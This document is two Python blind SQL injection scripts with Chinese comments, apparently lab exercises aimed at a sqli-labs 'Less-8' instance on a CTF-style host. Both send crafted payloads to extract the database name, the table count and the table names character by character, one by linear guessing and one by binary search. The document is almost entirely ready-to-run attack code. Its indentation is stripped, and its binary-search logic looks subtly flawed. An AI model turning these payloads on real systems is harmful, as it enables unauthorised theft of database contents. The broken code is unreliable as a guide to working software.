一、SQL盲注脚本(普通版):
import requests
url = "http://9fe5aba4-b55b-49d8-af3e-795e070d0b23.node5.buuoj.cn/Less-8/"
#获取数据库名称的长度:
payload_len = "?id=1' and length(database()) = {n} --+"
def getLength(url, payload):
length = 1
while True:
response = requests.get(url = url + payload_len.format(n = length))
if 'You are in...........' in response.text:
print('数据库名称长度为:', length)
return length
else:
print('正在测试长度:', length)
length += 1
#获取数据库的名称:
payload_str = "?id=1' and ascii(substr(database(), {n}, 1)) = {r} --+"
def getStr(url, payload, length):
str = '' #初始表名/库名为空
#第一层循环,截取每一个字符
for i in range(1, length + 1):
#第二层循环,枚举取字符的每一种可能性
for j in range(33, 126):
response = requests.get(url = url + payload_str.format(n = i, r = j))
#页面中出现此内容则表示成功
if 'You are in...........' in response.text:
str += chr(j)
print('第', i, '个字符猜解成功:', str)
break
return str
#获取数据库名称信息:
#length = getLength(url, payload_len)
#database_name = getStr(url, payload_str, length)
#获取数据库下表的数量:
table_count = 0
for i in range(1, 100):
payload_table_count = "?id=1' and (select count(table_name) from information_schema.tables where table_schema='security') = {n} --+"
response = requests.get(url = url + payload_table_count.format(n = i))
if 'You are in...........' in response.text:
table_count = i
break
else:
print('正在测试长度:', i)
print('数据库下表的数量为:', table_count)
#开始注出数据库下的表的信息:
#注出数据库下表的长度:
table_length = 0
for i in range(0, table_count):
for j in range(1, 100):
payload_table_length = "?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit {m},1))={n}--+"
response = requests.get(url = url + payload_table_length.format(m=i, n=j))
if 'You are in...........' in response.text:
table_length = j
break
else:
table_length += 1
print("正在测试第", i + 1, "张表的长度,长度为:", table_length)
print("第", i + 1, "张表的长度为:", table_length)
#注出表名:
table_name = ""
for k in range(1, table_length + 1):
for z in range(65, 127):
payload_table_name = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'security' limit {p}, 1),{q},1)) = {r} --+"
response = requests.get(url = url + payload_table_name.format(p=i, q=k, r=z))
if 'You are in...........' in response.text:
table_name += chr(z)
print("第", i + 1, "张表的表名为:", table_name)
break
print("第", i + 1, "张表的表名为:", table_name)
二、SQL盲注脚本(二分法):
import requests
url = "http://9fe5aba4-b55b-49d8-af3e-795e070d0b23.node5.buuoj.cn/Less-8/"
#获取数据库名称的长度:
payload_len = "?id=1' and length(database()) = {n} --+"
def getLength(url, payload):
length = 1
while True:
response = requests.get(url = url + payload_len.format(n = length))
if 'You are in...........' in response.text:
print('数据库名称长度为:', length)
return length
else:
print('正在测试长度:', length)
length += 1
#获取数据库的名称:
payload_str = "?id=1' and ascii(substr(database(), {n}, 1)) = {r} --+"
def getStr(url, payload, length):
str = '' #初始表名/库名为空
#第一层循环,截取每一个字符
for i in range(1, length + 1):
#第二层循环,枚举取字符的每一种可能性
for j in range(33, 126):
response = requests.get(url = url + payload_str.format(n = i, r = j))
#页面中出现此内容则表示成功
if 'You are in...........' in response.text:
str += chr(j)
print('第', i, '个字符猜解成功:', str)
break
return str
#获取数据库名称信息:
#length = getLength(url, payload_len)
#database_name = getStr(url, payload_str, length)
#获取数据库下表的数量:
table_count = 0
for i in range(1, 100):
payload_table_count = "?id=1' and (select count(table_name) from information_schema.tables where table_schema='security') = {n} --+"
response = requests.get(url = url + payload_table_count.format(n = i))
if 'You are in...........' in response.text:
table_count = i
break
else:
print('正在测试长度:', i)
print('数据库下表的数量为:', table_count)
#开始注出数据库下的表的信息:
#注出数据库下表的长度:
table_length = 0
for i in range(0, table_count):
for j in range(1, 100):
payload_table_length = "?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit {m},1))={n}--+"
response = requests.get(url = url + payload_table_length.format(m=i, n=j))
if 'You are in...........' in response.text:
table_length = j
break
else:
print("正在测试第", i + 1, "张表的长度,长度为:", j)
print("第", i + 1, "张表的长度为:", table_length)
#注出表名:
table_name = ""
for k in range(1, table_length + 1):
min = 33
max = 126
mid = (min + max) // 2
while min < max:
payload_table_name = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'security' limit {p}, 1),{q},1)) < {r} --+"
response = requests.get(url = url + payload_table_name.format(p=i, q=k, r=mid))
if 'You are in...........' in response.text:
max = mid
else:
min = mid + 1
mid = (min + max) // 2
if mid <= 32 or mid >= 127:
break
table_name += chr(mid - 1)
print("正在注出表名:", table_name)
print("第", i + 1, "张表的表名为:", table_name)